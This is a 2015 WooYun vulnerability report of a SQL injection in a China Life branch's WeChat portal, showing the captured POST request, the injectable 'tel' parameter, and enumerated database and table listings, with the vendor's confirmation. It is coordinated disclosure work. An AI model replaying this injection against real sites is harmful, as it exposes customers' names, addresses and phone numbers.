当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145390

漏洞标题:保险安全之中国人寿某分公司存在sql注入可导致大量用户姓名/地址/手机号等泄漏

相关厂商:中国人寿

漏洞作者: Martial

提交时间:2015-10-09 14:27

修复时间:2015-11-24 08:40

公开时间:2015-11-24 08:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-20: 细节向核心白帽子及相关领域专家公开
2015-10-30: 细节向普通白帽子公开
2015-11-09: 细节向实习白帽子公开
2015-11-24: 细节向公众公开

简要描述:

坑人的队友

详细说明:

微信端 国寿财险唐山中支

3.jpg


点击微官网
抓到一处数据包

POST /weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY HTTP/1.1
Host: www.winadd.cn
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://www.winadd.cn
Content-Length: 94
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13A342 MicroMessenger/6.3.1 NetType/WIFI Language/zh_CN
Referer: http://www.winadd.cn/weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY
Cookie: PHPSESSID=90b06811abbe786a7065f3fe860f90c7
wechaname=&tel=13012345678&truename=%E7%8E%8B%E5%B8%85&qq=&sex=1&birthday=2002033&action=index


注入参数是tel
大量数据库

available databases [9]:
[*] boyacms
[*] byhh-weixin
[*] byhh-weixinnew
[*] byhh_weixin_demo
[*] information_schema
[*] iwebmall
[*] mysql
[*] weixin
[*] x25gbk


看下当前数据库的表

Database: byhh-weixin
[138 tables]
+--------------------------+
| wx_access                |
| wx_access_token          |
| wx_activity              |
| wx_address               |
| wx_address_danyuan       |
| wx_address_loupan        |
| wx_adma                  |
| wx_alipay_config         |
| wx_api                   |
| wx_areply                |
| wx_article               |
| wx_autumns_box           |
| wx_autumns_ip            |
| wx_autumns_open          |
| wx_canyin_yaoqing        |
| wx_canyin_yaoqing_cart   |
| wx_case                  |
| wx_catemenu              |
| wx_cehua                 |
| wx_classify              |
| wx_company               |
| wx_diymen_class          |
| wx_diymen_set            |
| wx_dream                 |
| wx_feyin                 |
| wx_feyin_record          |
| wx_flash                 |
| wx_function              |
| wx_games                 |
| wx_games_record          |
| wx_home                  |
| wx_hongbao               |
| wx_hongbao_exchange      |
| wx_hongbao_log           |
| wx_hongbao_prize         |
| wx_hongbao_reward        |
| wx_hongbao_zhuli_log     |
| wx_host                  |
| wx_host_list_add         |
| wx_host_order            |
| wx_hots                  |
| wx_hotspinglun           |
| wx_hotuser               |
| wx_img                   |
| wx_indent                |
| wx_jingpai               |
| wx_jingpai_record        |
| wx_jsapi_ticket          |
| wx_kaiyedl               |
| wx_keyword               |
| wx_leitai_expense        |
| wx_lightapp              |
| wx_lightapp_detail       |
| wx_links                 |
| wx_liuyan                |
| wx_lottery               |
| wx_lottery_bound         |
| wx_lottery_record        |
| wx_marrycard             |
| wx_marrycard_wish        |
| wx_member                |
| wx_member_card_contact   |
| wx_member_card_coupon    |
| wx_member_card_create    |
| wx_member_card_exchange  |
| wx_member_card_info      |
| wx_member_card_integral  |
| wx_member_card_set       |
| wx_member_card_sign      |
| wx_member_card_vip       |
| wx_membercard            |
| wx_membercard_duihuan    |
| wx_membercard_record     |
| wx_membercard_user       |
| wx_menuplus              |
| wx_nearby_user           |
| wx_node                  |
| wx_open_tab              |
| wx_order                 |
| wx_ordering_class        |
| wx_ordering_set          |
| wx_other                 |
| wx_panorama              |
| wx_photo                 |
| wx_photo_list            |
| wx_product               |
| wx_product_cart          |
| wx_product_cart_list     |
| wx_product_cat           |
| wx_product_diningtable   |
| wx_qixi_question         |
| wx_qixi_shop_question    |
| wx_qixi_userinfo         |
| wx_qixi_userinfo_lottery |
| wx_recognition           |
| wx_recognition_record    |
| wx_red_packet            |
| wx_red_packet_exchange   |
| wx_red_packet_log        |
| wx_red_packet_prize      |
| wx_red_packet_reward     |
| wx_rekeyword             |
| wx_reply_info            |
| wx_requestdata           |
| wx_role                  |
| wx_role_user             |
| wx_selfform              |
| wx_selfform_input        |
| wx_selfform_value        |
| wx_site                  |
| wx_site_plugmenu         |
| wx_snccode               |
| wx_system_info           |
| wx_table_record          |
| wx_taobao                |
| wx_team                  |
| wx_team_tags             |
| wx_text                  |
| wx_token_open            |
| wx_token_open_div        |
| wx_user                  |
| wx_user_group            |
| wx_user_request          |
| wx_userinfo              |
| wx_users                 |
| wx_voiceresponse         |
| wx_weather               |
| wx_wecha_user            |
| wx_wecha_userinfo        |
| wx_wechat_group          |
| wx_wechat_group_list     |
| wx_wifi_relation         |
| wx_wifi_token            |
| wx_world_cup_date        |
| wx_world_cup_lottery     |
| wx_world_cup_name        |
| wx_world_cup_record      |
| wx_wxuser                |
+--------------------------+


涉及的信息

1.jpg


跑几个看下

2.jpg

漏洞证明:

1.jpg

修复方案:

过滤或者换个队友

版权声明:转载请注明来源 Martial@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-10 08:39

厂商回复:

谢谢。

最新状态:

暂无